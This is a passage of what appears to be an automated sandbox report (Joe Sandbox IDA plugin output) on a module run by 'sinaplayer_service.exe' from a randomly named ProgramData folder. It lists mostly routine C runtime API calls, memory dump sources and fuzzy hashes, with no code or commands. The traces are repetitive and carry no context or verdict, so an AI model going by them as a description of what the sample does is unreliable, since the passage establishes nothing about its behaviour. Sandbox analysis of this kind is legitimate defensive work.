                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D100ACA
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328987296-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D106C18
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D106C23
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D106C3D
                                                                                                                                                                                                    • __localtime32_s.LIBCMT(?,?), ref: 6D106C4F
                                                                                                                                                                                                      • Part of subcall function 6D107269: _errno.MSVCR120(?,?,6D106C54,?,?), ref: 6D107283
                                                                                                                                                                                                      • Part of subcall function 6D107269: _invalid_parameter_noinfo.MSVCR120(?,?,6D106C54,?,?), ref: 6D10728D
                                                                                                                                                                                                    • asctime.MSVCR120(?), ref: 6D106C5E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo$__localtime32_s_invalid_parameterasctime
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4154182036-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D108467
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D108472
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D10848C
                                                                                                                                                                                                    • __localtime32_s.LIBCMT(?,?), ref: 6D10849E
                                                                                                                                                                                                      • Part of subcall function 6D107269: _errno.MSVCR120(?,?,6D106C54,?,?), ref: 6D107283
                                                                                                                                                                                                      • Part of subcall function 6D107269: _invalid_parameter_noinfo.MSVCR120(?,?,6D106C54,?,?), ref: 6D10728D
                                                                                                                                                                                                    • __wasctime.LIBCMT(?), ref: 6D1084AD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo$__localtime32_s__wasctime_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2302537511-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D100B88
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D100B93
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D100BB7
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D100BC2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328987296-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _strnicmp_l.MSVCR120(?,?,?,00000000), ref: 6D0AE3C9
                                                                                                                                                                                                      • Part of subcall function 6D0AE311: _tolower_l.MSVCR120(00000000,00000000,?,?,?,?), ref: 6D0AE370
                                                                                                                                                                                                      • Part of subcall function 6D0AE311: _tolower_l.MSVCR120(00000000,00000000,00000000,00000000,?,?,?,?), ref: 6D0AE37F
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0DAB39
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0DAB44
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _tolower_l$_errno_invalid_parameter_noinfo_strnicmp_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1343604086-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D11BF50
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D11BF5B
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D11BF77
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D11BF82
                                                                                                                                                                                                    • __wcsncoll_l.LIBCMT(?,?,?,00000000), ref: 6D11BF9D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$__wcsncoll_l_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2322608260-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D11B84D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D11B858
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D11B874
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D11B87F
                                                                                                                                                                                                    • __strncoll_l.LIBCMT(?,?,?,00000000), ref: 6D11B89A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$__strncoll_l_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3877343156-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __doserrno.MSVCR120(?,6D097FEE,00000000,00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D094D84
                                                                                                                                                                                                    • __doserrno.MSVCR120(?,6D097FEE,00000000,00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D0DEFCE
                                                                                                                                                                                                    • _errno.MSVCR120(?,6D097FEE,00000000,00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D0DEFD6
                                                                                                                                                                                                    • _errno.MSVCR120(?,6D097FEE,00000000,00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D0DEFE6
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,6D097FEE,00000000,00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D0DEFF1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2315031519-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D101C95
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D101CA0
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D101CB2
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D101CBD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328987296-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000), ref: 6D0B5ABD
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000000), ref: 6D0B5AC8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: 0$9
                                                                                                                                                                                                    • API String ID: 2959964966-1975997740
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: 0$g
                                                                                                                                                                                                    • API String ID: 0-4178848223
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 6D0B6B72
                                                                                                                                                                                                      • Part of subcall function 6D0C6295: __87except.LIBCMT ref: 6D0C62D0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorHandling__87except__start
                                                                                                                                                                                                    • String ID: pow
                                                                                                                                                                                                    • API String ID: 2905807303-2276729525
                                                                                                                                                                                                    • Opcode ID: a0c341b4e956c37144ab13a128492a4ddfeeb11b87ba7cedb50d1fb791f4603b
                                                                                                                                                                                                    • Instruction ID: 628095a2b7bb56528bc669058719f07229d813b4087e7e10aa5287a83e114a12
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0c341b4e956c37144ab13a128492a4ddfeeb11b87ba7cedb50d1fb791f4603b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44511561A1C20786FB12A714C91077E3BF4EB42714FE08969E4D58B2B8DB3784D58EC7
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DName::DName.LIBCMT ref: 6D0DB64A
                                                                                                                                                                                                    • DName::operator+.LIBCMT ref: 6D0DB651
                                                                                                                                                                                                      • Part of subcall function 6D0B01E3: DName::DName.LIBCMT ref: 6D0B029A
                                                                                                                                                                                                      • Part of subcall function 6D0B01E3: DName::operator+.LIBCMT ref: 6D0B02A1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::Name::operator+
                                                                                                                                                                                                    • String ID: CV:
                                                                                                                                                                                                    • API String ID: 2649573449-3725821052
                                                                                                                                                                                                    • Opcode ID: 7e7c4a76bfc01d806e71240a08227e6f454687cd83089c4cc6194d21a8cac9f8
                                                                                                                                                                                                    • Instruction ID: a7e5779484c11fa911c0397d3cef96378ed3a51848658d0af63f41f3d9180866
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e7c4a76bfc01d806e71240a08227e6f454687cd83089c4cc6194d21a8cac9f8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A541D2359882869FFB15CFFAD481BBA7BF6AF0A301F09506ED41187292D7B49881CB10
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0F3608: TlsGetValue.KERNEL32(6D0E98A4), ref: 6D0F361A
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6D0FA65B
                                                                                                                                                                                                    • swprintf_s.MSVCR120(?,00000401,[%d:%d:%d:%d(%d)] ,00000000,?,?,?,?,?,6D0FA4C1,?), ref: 6D0FA685
                                                                                                                                                                                                    • vswprintf.LIBCMT(00000401,00000401,?,6D0FA4C1,?,?,?,?,?,6D0FA4C1,?), ref: 6D0FA6AD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentThreadValueswprintf_svswprintf
                                                                                                                                                                                                    • String ID: [%d:%d:%d:%d(%d)]
                                                                                                                                                                                                    • API String ID: 281614720-3832470304
                                                                                                                                                                                                    • Opcode ID: 8583332a4ed687a0647995c60f8c44059e0b103e4026ed90aa35d9fbef200eb1
                                                                                                                                                                                                    • Instruction ID: 376238d95d3be1c57c811feb0885692888b651284afc60bd119a6fd3e6057aca
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8583332a4ed687a0647995c60f8c44059e0b103e4026ed90aa35d9fbef200eb1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E621F135200202AFE7059BA8C885F7B77F9EF88340B75446DFA16C7260EBB199528790
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe,00000104,?,?,?,?,?,?,6D0B0E43), ref: 6D0B1D7A
                                                                                                                                                                                                    • _malloc_crt.MSVCR120 ref: 6D0B1DC9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileModuleName_malloc_crt
                                                                                                                                                                                                    • String ID: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe$y[
                                                                                                                                                                                                    • API String ID: 2373854079-1468285253
                                                                                                                                                                                                    • Opcode ID: e4bdc908308af44aa47061e21bfca6075cf8a95d53c5ef3d06b00c025d43f477
                                                                                                                                                                                                    • Instruction ID: 17702d436238bde4c05f2a81737908e6b0fb5304c0451b87fbdf1aea89ff3491
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4bdc908308af44aa47061e21bfca6075cf8a95d53c5ef3d06b00c025d43f477
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D1196B1D08504ABE710CBA8D885EAF77BCEA4A325751026AE521D3150E7B29A00C7E2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,000001CA,97AFC1B1,00000000,00000055,00000000,?,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A82EF
                                                                                                                                                                                                    • _wcscspn.LIBCMT(6D0A81B3,_.,,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A831B
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,00000040,6D0A81B3,00000000,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A8367
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,00000010,6D0A81B5,0000000F,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A83B0
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,?,?,?,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0DF768
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wcsncpy_s$_invoke_watson_wcscspnmemset
                                                                                                                                                                                                    • String ID: _.,
                                                                                                                                                                                                    • API String ID: 1770680180-2709443920
                                                                                                                                                                                                    • Opcode ID: 388abb90159c821bf9fe04964fbc453e780735b3bd542545b7f102d73af23ed1
                                                                                                                                                                                                    • Instruction ID: 820aca34a48bd57de091716d97e99a8aade20b15b8d5d29333fcef8f4e8af9e5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 388abb90159c821bf9fe04964fbc453e780735b3bd542545b7f102d73af23ed1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 461123729083C66EFB108AA88850BBE37B8EF01764F58401EFE95AF182DB70DD41D655
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,000001CA,97AFC1B1,00000000,00000055,00000000,?,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A82EF
                                                                                                                                                                                                    • _wcscspn.LIBCMT(6D0A81B3,_.,,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A831B
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,00000040,6D0A81B3,00000000,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A8367
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,00000010,6D0A81B5,0000000F,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A83B0
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,?,?,?,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0DF768
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wcsncpy_s$_invoke_watson_wcscspnmemset
                                                                                                                                                                                                    • String ID: _.,
                                                                                                                                                                                                    • API String ID: 1770680180-2709443920
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlUnwind.KERNEL32(?,6D0B5811,80000026,00000000,?,?), ref: 6D0B580C
                                                                                                                                                                                                    • _local_unwind2.MSVCR120(?,?,?), ref: 6D0B5825
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Unwind_local_unwind2
                                                                                                                                                                                                    • String ID: &$02CV
                                                                                                                                                                                                    • API String ID: 2435528123-3673091860
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfowcslen
                                                                                                                                                                                                    • String ID: I
                                                                                                                                                                                                    • API String ID: 2689964535-3707901625
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfostrlen
                                                                                                                                                                                                    • String ID: I
                                                                                                                                                                                                    • API String ID: 1371076374-3707901625
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,00000000,.im,?,6D0D2519,00000000,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E), ref: 6D0EF8BD
                                                                                                                                                                                                      • Part of subcall function 6D0A3E7E: __EH_prolog3.LIBCMT ref: 6D0A3E85
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000,.im,?,6D0D2519,00000000,?,00000000,00000000,?,?,?,?,6D0A58C9), ref: 6D0EF8E2
                                                                                                                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000,?,00000000), ref: 6D0EF8E9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ProcessVersion@$AffinityConcurrency@@CurrentH_prolog3Manager@1@MaskResource
                                                                                                                                                                                                    • String ID: .im
                                                                                                                                                                                                    • API String ID: 2898901060-4014146257
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,FFFFFFFE,00000008,?,6D0B3FA2,00000000,?,6D0B427E,00000000,6D0B4238,0000001C,6D0FBBC7,00000000,00000001,00000000), ref: 6D0B3F4B
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(FFFFFFFE,CorExitProcess), ref: 6D0B3F5D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                    • API String ID: 1646373207-1276376045
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • free.MSVCR120(?,?,6D0EAF12), ref: 6D0EAF79
                                                                                                                                                                                                      • Part of subcall function 6D08ECE0: HeapFree.KERNEL32(00000000,00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D08ECF4
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,6D0EAF12), ref: 6D0EAF81
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6D0EAF12), ref: 6D0EAF89
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,6D0EAF12), ref: 6D0EAF91
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,6D0EAF12), ref: 6D0EAF97
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$FreeHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 32654580-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,6D0B028F,00000000,00000000,0000000A,?,6D0DD096,?,?,00000010,00000000,00000000,00000000), ref: 6D0B267B
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,6D0B028F,00000000,00000000,0000000A,?,6D0DD096,?,?,00000010,00000000,00000000,00000000), ref: 6D0D6F90
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_getptd_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2821341848-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • iswctype.MSVCR120(000000A0,00000008,000000A0,?,0000009C,?,?,?,6D129BDB,?,00000000), ref: 6D09C7DE
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: iswctype
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 304682654-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _mbtowc_l.MSVCR120(?,?,?,?), ref: 6D09DD43
                                                                                                                                                                                                      • Part of subcall function 6D09EF00: _isleadbyte_l.MSVCR120(?,?), ref: 6D09EF4B
                                                                                                                                                                                                      • Part of subcall function 6D09EF00: MultiByteToWideChar.KERNEL32(00000080,00000009,6D0D5D30,00000001,00000000,00000000), ref: 6D09EF73
                                                                                                                                                                                                    • strlen.MSVCR120(?), ref: 6D09DDBC
                                                                                                                                                                                                    • __forcdecpt_l.LIBCMT ref: 6D09DED6
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D09DFCD
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide__forcdecpt_l_isleadbyte_l_mbtowc_lfreestrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1852445238-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __forcdecpt_l_mbtowc_lstrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 810383619-0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: d81fa952071bb7eea505d799915084b5543237b7fd98f7b417266864623ed8db
                                                                                                                                                                                                    • Instruction ID: 314950b3ce5f98ea5a58913c7916615c811b99c42eab0009b98b79282454b67d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d81fa952071bb7eea505d799915084b5543237b7fd98f7b417266864623ed8db
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76512AB6A5430E8FEB44CE1CD89479D33F2FB46314FA5822BE910CB281D3B5E9118B90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::GetHistory.LIBCMT ref: 6D0EE97B
